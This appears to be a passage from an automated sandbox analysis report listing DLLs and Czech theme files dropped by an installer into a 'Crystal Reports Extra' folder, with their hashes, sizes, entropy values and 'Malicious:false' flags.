                                                          MD5:F68C187D209127BB0A4487B23EC29A25
                                                          SHA1:54726179BDDE7A6BD341B2BA3464E3B79CEA08C7
                                                          SHA-256:23FD4DAAB07107BFB9FD0950C0490BA65DF2FBC21680E46D9B93800E38BD1943
                                                          SHA-512:7364E67CBE7449C35930649C1B1360B88448893CCC207D1DCF5D3216F6C9CE33C9F4B0873A1E6AAC8C151A76F9D082B4C5C1E42DBA5800B789B72F74C9065540
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-L6ITB.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):53248
                                                          Entropy (8bit):4.571289360851901
                                                          Encrypted:false
                                                          SSDEEP:384:Lo5zW/Z0L39rAzRdjfNnCuYE0myI+Stu1OooEoZj1ofV5dkn67vc6ea3bKyEeJPG:LorLSpl2HJ3orWB3F9JUsm/n
                                                          MD5:253BC53169AD46B1EAFB92982BA7268E
                                                          SHA1:3F2F8C6324480B1F39C7BC06B8503FEEDFE5DEF4
                                                          SHA-256:CA513F09B64F8E3DC8EE09663854ADF7E4E84544133D07A3A2EF55701ABFAD4C
                                                          SHA-512:AB6847F2B7E07E85D555B313D63F74D4E74E50EA09EF32FE427822A25ECA12264A49347428D32F42ED65C669C28DAC426310BBD401A21C03177BD9729CFB5E08
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-MMNOC.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):6.049364088538635
                                                          Encrypted:false
                                                          SSDEEP:384:RHKAwDe/yMw0U0GuOI+KDYZ1EWsLKkSqPmMmg2oes9yzCuFYh3oDqLjBISO0IqMU:RHKAm0UsO76WsxDmELsCDIMiH3YN
                                                          MD5:928C9EEA653311AF8EFC155DA5A1D6A5
                                                          SHA1:27300FCD5C22245573F5595ECBD64FCE89C53750
                                                          SHA-256:6DC4BEE625A2C5E3499E36FE7C6FF8EAD92ADF6AAE40C4099FDC8EF82E85B387
                                                          SHA-512:0541D706BB53F8A04C78FCF327C4557553FA901D645AD2FD446E79753B4729F1E36793F42FBDD9B5E92073A30ED9A3DD853773A06EBEA8E9302ECE91A6C5362C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-N95UU.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):147456
                                                          Entropy (8bit):5.132194016685221
                                                          Encrypted:false
                                                          SSDEEP:3072:Ju6aJX0iugleTtmPzeLmQlV9MxSh356/JwQ3QklkuSmpKFb4NbkR2:9aJX0i9PaLmQlVxhw53w5bsbk
                                                          MD5:D817A6EC84CC47899F249B2C03B5F985
                                                          SHA1:5EBF96041A694C85BAD7F71F0679F64700EE272E
                                                          SHA-256:0A5DC4026BCEEB4AFDDDD73E3E16CC7224B2640E86A379D9AFE6E5A81CE1ECDC
                                                          SHA-512:96D161C7844304D4466384F5A25E27E54F0A79FEFC51E0656746837D31772EB84AB203E13686391B5FA0126F0F3C705876C1C1AE8EEF4E4F0EC67C8C379918A2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-OSEV1.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):183312
                                                          Entropy (8bit):6.740673842072804
                                                          Encrypted:false
                                                          SSDEEP:3072:8vvDF1nexZZNNi2k7EBSh2BL5BvgjTSxUCwb5bL8Bu1A5d:8nDF1nexZZBk7Rhi8jTnLMu1A/
                                                          MD5:E9644E54C403DD5C0EF89C85ADA3E295
                                                          SHA1:A42708B2837DBA534E4CB866266E4959B28DA452
                                                          SHA-256:72ECD276B372487AF75C67877ECCC0ED4D15F2C07FFA7F631D8056038D0E8122
                                                          SHA-512:22411A9E8A9F7082B4CF90C3C906E414B62B4BD2B9B10EA1694EC5651E3DEC8D2E4716354F5B09D6396F4C094555F5F08B26534647A98DFA7B3039D6C1E219F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-Q7NRR.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4506112
                                                          Entropy (8bit):6.845537378265025
                                                          Encrypted:false
                                                          SSDEEP:98304:FNk4pd+tbCY0HAYYid0wHYNkzi5bbTGksCWj:Yud+tWYOYezi5rGkn6
                                                          MD5:BD67B10210CEE1EC1F07A6CFD1954C77
                                                          SHA1:6DF09D5D96BF13F7A1515031AC5DF116F1159A48
                                                          SHA-256:EC6C0F1448E3C2A27BC67C354E1315A1E9088E4E517D099F87036E728B084AD2
                                                          SHA-512:BE053FB03C6123F6DB7FA4E3024A5C632007D516CF430ECA221387A77A2EA91A36976DA38467B5CAD4331E3ED7034E6D0686E323BD56CF2C439378A76288ED34
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-RSFVI.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):421792
                                                          Entropy (8bit):5.89089312168092
                                                          Encrypted:false
                                                          SSDEEP:6144:IBv/Y6oqGY2NID1MMf07QxjopowBvBBvm:IBv/Y6oiYIup7QVopowBvBBvm
                                                          MD5:10F4396344E93CE328529A26CC026082
                                                          SHA1:51895B0BE7B772EBE747336E4E0F57D8BBC5D277
                                                          SHA-256:5CA366D8C7102434E6D8E80C30BA3B4FD99AB5082C629C95D7F870DD8F0F8A27
                                                          SHA-512:770A801011E2FCA3052AF437CAE4930A1BCAF2CAE55FFC7A29249196B26AF7599551BDE4C7CEBDB6472E1A400182E711B9590CBAC90A9F28C7F10FBE37FA064D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: GNU GENERAL PUBLIC LICENSE. Version 3, 29 June 2007.. Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed... Preamble.. The GNU General Public License is a free, copyleft license for.software and other kinds of works... The licenses for most software and other practical works are designed.to take away your freedom to share and change the works. By contrast,.the GNU General Public License is intended to guarantee your freedom to.share and change all versions of a program--to make sure it remains free.software for all its users. We, the Free Software Foundation, use the.GNU General Public License for most of our software; it applies also to.any other work released this way by its authors. You can apply it to.your programs, too... When we speak of free software, we are referring to
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-TECE4.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):7182
                                                          Entropy (8bit):3.851683776363626
                                                          Encrypted:false
                                                          SSDEEP:96:AT0nsNJmBwoCtrOEhXpOITI151ihv2idiG:83KwoCtrOESITI151ihvtp
                                                          MD5:A5A239C980D6791086B7FE0E2CA38974
                                                          SHA1:DBD8E70DB07AC78E007B13CC8AE80C9A3885A592
                                                          SHA-256:FB33C708C2F83C188DC024B65CB620D7E2C3939C155BC1C15DC73DCCEBE256B7
                                                          SHA-512:8667904DDA77C994F646083EF39B1F69C2961758C3DA60CECADFE6D349DD99934C4D8784F8E38AE8B8C9EB9762EDD546F2A7B579F02612578F8049E9D10E8DA7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\is-VO510.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):95232
                                                          Entropy (8bit):6.030616936830931
                                                          Encrypted:false
                                                          SSDEEP:1536:2LUkWfOuFIGlk4dltwXg2/y8fN3SOpynIS9384xZLr0alK3TVzVf1JJKDo7wvaJT:2LVWfOuSItk3/hZS1d/04CTpVf1JJKDC
                                                          MD5:8C72FC2D0C83E1698B0FC50775310B16
                                                          SHA1:D8C49BB33E9239CFBD76FFCCE8A95485A90A46BF
                                                          SHA-256:31A3DDED0E009827E09BE2B2BEC6FC033CB06C147AF67FBE818EA82FD5541BE2
                                                          SHA-512:B9630C7B6E53B276FC0C101E054530E51493989870AEAD05207BA4CE36BCEA946DDDB0B130EF5A2379F10930DCA4AF2036E32AF75FF38D6430145D89AE9E0B37
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libbson-1.0.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):183312
                                                          Entropy (8bit):6.740673842072804
                                                          Encrypted:false
                                                          SSDEEP:3072:8vvDF1nexZZNNi2k7EBSh2BL5BvgjTSxUCwb5bL8Bu1A5d:8nDF1nexZZBk7Rhi8jTnLMu1A/
                                                          MD5:E9644E54C403DD5C0EF89C85ADA3E295
                                                          SHA1:A42708B2837DBA534E4CB866266E4959B28DA452
                                                          SHA-256:72ECD276B372487AF75C67877ECCC0ED4D15F2C07FFA7F631D8056038D0E8122
                                                          SHA-512:22411A9E8A9F7082B4CF90C3C906E414B62B4BD2B9B10EA1694EC5651E3DEC8D2E4716354F5B09D6396F4C094555F5F08B26534647A98DFA7B3039D6C1E219F7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libffi-6.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32585
                                                          Entropy (8bit):5.416596489081668
                                                          Encrypted:false
                                                          SSDEEP:384:5735N1fmZFO+S2uCtA2ostKbKSGQWlVsMb9XaVuXYA4iYG+mbe3FhEKoafNDhwrc:+6AuBOgPW3dasqiYGxq3FmKhrh
                                                          MD5:F68C187D209127BB0A4487B23EC29A25
                                                          SHA1:54726179BDDE7A6BD341B2BA3464E3B79CEA08C7
                                                          SHA-256:23FD4DAAB07107BFB9FD0950C0490BA65DF2FBC21680E46D9B93800E38BD1943
                                                          SHA-512:7364E67CBE7449C35930649C1B1360B88448893CCC207D1DCF5D3216F6C9CE33C9F4B0873A1E6AAC8C151A76F9D082B4C5C1E42DBA5800B789B72F74C9065540
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgmodule-2.0-0.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):41984
                                                          Entropy (8bit):6.132770955803513
                                                          Encrypted:false
                                                          SSDEEP:768:bgaowTgGpoQHcE4UJmcCqr7/rz/WGc4kedF0emlBQQhpjxH:bgsppvHc1Cb7ldnmlBQkdH
                                                          MD5:4D233A220F91DE3B1510D017B5481942
                                                          SHA1:C59F449B0D09127D18268E7B07DA3F7D749B2720
                                                          SHA-256:08336089E280805C8AC89F7476526F944B5868C014748B6DC29F65167E9E3AB0
                                                          SHA-512:A86A1F9B5D160813C6E2F771962F303428604057B9613021BF7844C1204CFCA0A18571A28D950D7999ACC4ECDE0605095F9A460A9B79FE2BBE02F080C2683923
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgpg-error6-0.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):95232
                                                          Entropy (8bit):6.030616936830931
                                                          Encrypted:false
                                                          SSDEEP:1536:2LUkWfOuFIGlk4dltwXg2/y8fN3SOpynIS9384xZLr0alK3TVzVf1JJKDo7wvaJT:2LVWfOuSItk3/hZS1d/04CTpVf1JJKDC
                                                          MD5:8C72FC2D0C83E1698B0FC50775310B16
                                                          SHA1:D8C49BB33E9239CFBD76FFCCE8A95485A90A46BF
                                                          SHA-256:31A3DDED0E009827E09BE2B2BEC6FC033CB06C147AF67FBE818EA82FD5541BE2
                                                          SHA-512:B9630C7B6E53B276FC0C101E054530E51493989870AEAD05207BA4CE36BCEA946DDDB0B130EF5A2379F10930DCA4AF2036E32AF75FF38D6430145D89AE9E0B37
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libgthread-2.0-0.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):6.027050012874634
                                                          Encrypted:false
                                                          SSDEEP:768:bKZB2wewH8k43RncCqCbj9zAwLc0N+eD5JemQRR5Q7:bKZr5H8VmuECDGmQRR5Q7
                                                          MD5:CF2571C125FA1D2EC55B9977054F380A
                                                          SHA1:91014DD50F0EEB0D3D1FAED77541C76A05B712B8
                                                          SHA-256:02B817B6DB18DB2DFCCEFDD08EED64A696E2BF326F4120EE7E93AE6AA73BCCB3
                                                          SHA-512:A95BF3436EA2FAC443924C5FC31FCD4337A44702EF38CA82D744474301E53F14721EAEB0F21E515CCFF8569E7B7D81107FB5A4CF2AE485CD4A5D2DC95DAE8F9B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libintl-8.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):120774
                                                          Entropy (8bit):6.037077757732975
                                                          Encrypted:false
                                                          SSDEEP:3072:nPE0Yx2cwD/Dtixvr6FkTwCD4N8FBKd8UR:sMzD/amFE4NQKd8UR
                                                          MD5:082A8171C726E58C1618DA3781AB7833
                                                          SHA1:5D74E7F8F5E14C1A70331A03456C68BB33AC17E2
                                                          SHA-256:AE1A1179289D1AB3B406F4BB347284464123C51BE50C1BCF38F2B5DD691E065C
                                                          SHA-512:837433AA29DFF1BD35AEB800B8DC69FB881BB2C435BF5BBA0AD7E809AD4CEA765B179DB4024A53F92E6B905FC964F23ED79949FA84424F864BBB88F140BD8682
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libmongoc-1.0.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):232976
                                                          Entropy (8bit):6.644092741800531
                                                          Encrypted:false
                                                          SSDEEP:6144:VBx0S/dXV86pr06/oG5NMR2jzm1YunTcUmAe0I70s0cYJyUqQmoUjW2v4ZzuFdA:hldXVjTD/m1YunTcZAe0I70s0cYQUqoX
                                                          MD5:A80D629D6329DC31D5CB1157D853AFAB
                                                          SHA1:A2FA781452106CDF17A83E3E59C6FE50D557E62C
                                                          SHA-256:500EE04865DBB7BEB9474E0C2AEBD6713DF4407C849EC134457C7D0CA289FAF0
                                                          SHA-512:4E0253615D4C3C418B93547370F416EDF5326BF66E3A5872C687B129E65E5967DC3D4AE97CF524CA5E77327B0CE07D93BA63470D541614A6685EBD26E0C7427B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libnettle-4-6.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):182365
                                                          Entropy (8bit):6.791628337519772
                                                          Encrypted:false
                                                          SSDEEP:3072:FiP8zpgWMwBsaEcWfsUGPWTSMqqDVw7P3FwBP1ELFy:Fu8NsgsidwxqqDVMFwBaFy
                                                          MD5:854C550450BEDDEBAAFE1DD74F073641
                                                          SHA1:3DB1545773EA7756D6A87B3693148ABCD1CDAB86
                                                          SHA-256:8561D32E30B3DEC9FFD24B1BD87E96444FD6D3D304D64F80C6D99E112411DC48
                                                          SHA-512:42AF4079F184A0F8E22689F55DFA225F10B20FF8C0816D728CE022573E5EF1F1412B87000F0EF375D7DFC2A1D734A2047D539597EA4FE8EF1D5A2895053C50D1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libogg-0.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):46592
                                                          Entropy (8bit):6.294286952115658
                                                          Encrypted:false
                                                          SSDEEP:768:BZIF0ff+vrzUHQH/E4zR2cCqz7iDz3Kocq8eeIKKem+nH3g/i3/:BWFsf+vrzUwH/15EzFeIWm+H3R3
                                                          MD5:84E8E72572D53558D52403011FA0D388
                                                          SHA1:865160DA7DBFAAEA224541EB44E9430E1A7B7B20
                                                          SHA-256:CA717B5CF2A7B0E047AABAD985C631278941C58F16E2E9650CA12C3A331FCD4F
                                                          SHA-512:47EE932BFA4EE3C51C3828EF8C6923E5B946966AD8E255BC2C53A60443AA2D4AB17521F21912A6F0469C7898D6543DC4B1783A86DDB5A84568818A7B37EC3992
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libssl-40.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4506112
                                                          Entropy (8bit):6.845537378265025
                                                          Encrypted:false
                                                          SSDEEP:98304:FNk4pd+tbCY0HAYYid0wHYNkzi5bbTGksCWj:Yud+tWYOYezi5rGkn6
                                                          MD5:BD67B10210CEE1EC1F07A6CFD1954C77
                                                          SHA1:6DF09D5D96BF13F7A1515031AC5DF116F1159A48
                                                          SHA-256:EC6C0F1448E3C2A27BC67C354E1315A1E9088E4E517D099F87036E728B084AD2
                                                          SHA-512:BE053FB03C6123F6DB7FA4E3024A5C632007D516CF430ECA221387A77A2EA91A36976DA38467B5CAD4331E3ED7034E6D0686E323BD56CF2C439378A76288ED34
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\libtasn1-6.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):80653
                                                          Entropy (8bit):5.935029812256724
                                                          Encrypted:false
                                                          SSDEEP:1536:K7jqZI3jgg9IJgo+wrcKl8l2gdejHL8jT7x8ZKQi3uh:yUojggfo+wgl2gGHLYXx80T3uh
                                                          MD5:266FA5BAC8FAB45A57B3EB68495334F4
                                                          SHA1:C845B88A5F2279E348886E4D6246F855ACAA85B9
                                                          SHA-256:C8A3B86D6E930B21F428A3CAC3CC8FB432716D16043824DF886731565BFE8A23
                                                          SHA-512:EF8CAEF0A926865D4B1FE0CE51DC9542B814EB76392F85895A042AC514C529426519C83BCEC2EB976848D174D504E2852FA854C06A70D21F4E16DEBD533E3D0A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\mingwm10.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):7182
                                                          Entropy (8bit):3.851683776363626
                                                          Encrypted:false
                                                          SSDEEP:96:AT0nsNJmBwoCtrOEhXpOITI151ihv2idiG:83KwoCtrOESITI151ihvtp
                                                          MD5:A5A239C980D6791086B7FE0E2CA38974
                                                          SHA1:DBD8E70DB07AC78E007B13CC8AE80C9A3885A592
                                                          SHA-256:FB33C708C2F83C188DC024B65CB620D7E2C3939C155BC1C15DC73DCCEBE256B7
                                                          SHA-512:8667904DDA77C994F646083EF39B1F69C2961758C3DA60CECADFE6D349DD99934C4D8784F8E38AE8B8C9EB9762EDD546F2A7B579F02612578F8049E9D10E8DA7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\pthreadGC2.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                          Category:dropped
                                                          Size (bytes):36352
                                                          Entropy (8bit):6.049364088538635
                                                          Encrypted:false
                                                          SSDEEP:384:RHKAwDe/yMw0U0GuOI+KDYZ1EWsLKkSqPmMmg2oes9yzCuFYh3oDqLjBISO0IqMU:RHKAm0UsO76WsxDmELsCDIMiH3YN
                                                          MD5:928C9EEA653311AF8EFC155DA5A1D6A5
                                                          SHA1:27300FCD5C22245573F5595ECBD64FCE89C53750
                                                          SHA-256:6DC4BEE625A2C5E3499E36FE7C6FF8EAD92ADF6AAE40C4099FDC8EF82E85B387
                                                          SHA-512:0541D706BB53F8A04C78FCF327C4557553FA901D645AD2FD446E79753B4729F1E36793F42FBDD9B5E92073A30ED9A3DD853773A06EBEA8E9302ECE91A6C5362C
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\is-DDSCO.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):340
                                                          Entropy (8bit):4.329376027112529
                                                          Encrypted:false
                                                          SSDEEP:6:uCohGf+wnvVEk6ubLCG3jOQU4uDCpN+ODaJ/CMt1lyvYs1vyQ:Ah7qvVR+aOeuDeNNaZ/wvB1vn
                                                          MD5:2E5417F883E221DAD966C8C7851294C2
                                                          SHA1:AB1B82343073A226CD8D12875E2ABAB05249C6A9
                                                          SHA-256:440E0557C735D1AF2DC425C5FB095F3DF4B3A12BB95F65CE04CAD9CCDD5FCA2D
                                                          SHA-512:2E2326391189FC0B98F727A6EAC5211F600C4D9A2BD7A986C696AD6220DC2AB33D28D4AFC2F551D1F68FFC5DFA5C73FAADA067BD13C5333DC3B9B3A9E99E1E7E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 0|A.0|a.3|B.3|b.2|C.2|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.6|Z.6|Z.0|Y.0|y.9|!.9|..9|".9|..9|/.9|..5| .0|1.0|+.1|2.1|..1|3.1|..2|4.2|..3|5.3|..3|6.3|..6|7.6|..6|8.6|..7|9.7|..9|0.9|..8|,.0|;.9|..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\is-J58EF.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):61
                                                          Entropy (8bit):4.502287699697848
                                                          Encrypted:false
                                                          SSDEEP:3:U96Q+ALu3LRRDJNtfEFju9m/LJ:UYQ+WGRxEFqWt
                                                          MD5:97C705D1301F982E0010876C8FDA614E
                                                          SHA1:ACDB1D10A6B7AEA47932A100D36A6F9D867C40C1
                                                          SHA-256:DB42C3BC77F54B145D013C395509A5496DA3B5A8D4730C5F593E2835F1F2D7F5
                                                          SHA-512:170CD69F3CF93EB7315390A569D4D03BB9CB1D606D8DE8B63B267BC2E1E8B45E8683BAF929016E0F45840C68A221E0C3B58B7A6A48E89715234E450D5D3F2377
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_font_name=DoulosSILR.ttf.theme_locale_name=cs_CZ.UTF-8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\keyboard.lst (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):340
                                                          Entropy (8bit):4.329376027112529
                                                          Encrypted:false
                                                          SSDEEP:6:uCohGf+wnvVEk6ubLCG3jOQU4uDCpN+ODaJ/CMt1lyvYs1vyQ:Ah7qvVR+aOeuDeNNaZ/wvB1vn
                                                          MD5:2E5417F883E221DAD966C8C7851294C2
                                                          SHA1:AB1B82343073A226CD8D12875E2ABAB05249C6A9
                                                          SHA-256:440E0557C735D1AF2DC425C5FB095F3DF4B3A12BB95F65CE04CAD9CCDD5FCA2D
                                                          SHA-512:2E2326391189FC0B98F727A6EAC5211F600C4D9A2BD7A986C696AD6220DC2AB33D28D4AFC2F551D1F68FFC5DFA5C73FAADA067BD13C5333DC3B9B3A9E99E1E7E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 0|A.0|a.3|B.3|b.2|C.2|c.2|D.2|d.2|E.2|e.3|F.3|f.3|G.3|g.6|H.6|h.7|I.7|i.6|J.6|j.7|K.7|k.8|L.8|l.6|M.6|m.6|N.6|n.8|O.8|o.9|P.9|p.0|Q.0|q.3|R.3|r.1|S.1|s.3|T.3|t.6|U.6|u.3|V.3|v.1|W.1|w.1|X.1|x.6|Z.6|Z.0|Y.0|y.9|!.9|..9|".9|..9|/.9|..5| .0|1.0|+.1|2.1|..1|3.1|..2|4.2|..3|5.3|..3|6.3|..6|7.6|..6|8.6|..7|9.7|..9|0.9|..8|,.0|;.9|..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\settings.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):61
                                                          Entropy (8bit):4.502287699697848
                                                          Encrypted:false
                                                          SSDEEP:3:U96Q+ALu3LRRDJNtfEFju9m/LJ:UYQ+WGRxEFqWt
                                                          MD5:97C705D1301F982E0010876C8FDA614E
                                                          SHA1:ACDB1D10A6B7AEA47932A100D36A6F9D867C40C1
                                                          SHA-256:DB42C3BC77F54B145D013C395509A5496DA3B5A8D4730C5F593E2835F1F2D7F5
                                                          SHA-512:170CD69F3CF93EB7315390A569D4D03BB9CB1D606D8DE8B63B267BC2E1E8B45E8683BAF929016E0F45840C68A221E0C3B58B7A6A48E89715234E450D5D3F2377
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: theme_font_name=DoulosSILR.ttf.theme_locale_name=cs_CZ.UTF-8.
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\abeceda.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:UTF-8 Unicode text
                                                          Category:dropped
                                                          Size (bytes):78
                                                          Entropy (8bit):3.899829828948582
                                                          Encrypted:false
                                                          SSDEEP:3:O81Y5qTivtvmfBy7UlWf2vxvwvzv8N+nPyn:ONCilmZiOa2Bw7OKPyn
                                                          MD5:CA1D4315A55A43CE742942BD35034034
                                                          SHA1:5149927E633B4320D00600FDD5A12A367956D49E
                                                          SHA-256:77891560CAC7B7F2ED6AE01E7BFC979EFC1AF6AB686C534F03CFBCAEAB002A3B
                                                          SHA-512:18C88C698B33AC6312BE9ED7EB8D8840605AD33D3AB87650F643E964871EA7171DDD4C69FC121D64548CF5B192BEC5D634A3059DCC876227F7702AF201643823
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Abeceda.A.B.C.D.E.F.G.H.CH.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z...........
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\themes\czech\words\is-60AQ9.tmp
